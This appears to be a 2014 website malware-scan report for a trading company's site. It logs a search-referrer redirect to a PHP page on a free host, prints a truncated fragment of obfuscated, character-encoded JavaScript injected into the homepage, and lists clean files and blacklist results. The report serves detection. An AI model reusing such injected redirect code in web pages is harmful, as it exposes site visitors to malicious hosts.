Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.hekmiehtradeco.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.hekmiehtradeco.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 12 Sep 2014 19:38:29 GMT Location: http://jaroj23.freehost.pl/fHVkcWL9.php Server: nginx/1.6.1 Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.hekmiehtradeco.com/ | 200 OK Content-Length: 24695 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,151,154,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,151,154,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,150,175,154,165,150,171,65,154,172,66,171,161,153,111,130,112,176,165,65,167,157,167,56,102,24,21,47,151,154,65, Antivirus reports:
| ||
http://www.hekmiehtradeco.com/templates/ja_acrus/scripts/ja_script.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://www.hekmiehtradeco.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://www.hekmiehtradeco.com/templates/ja_acrus/scripts/ | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://www.hekmiehtradeco.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hekmiehtradeco.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hekmiehtradeco.com/
Result: hekmiehtradeco.com is not infected or malware details are not published yet.
Result: hekmiehtradeco.com is not infected or malware details are not published yet.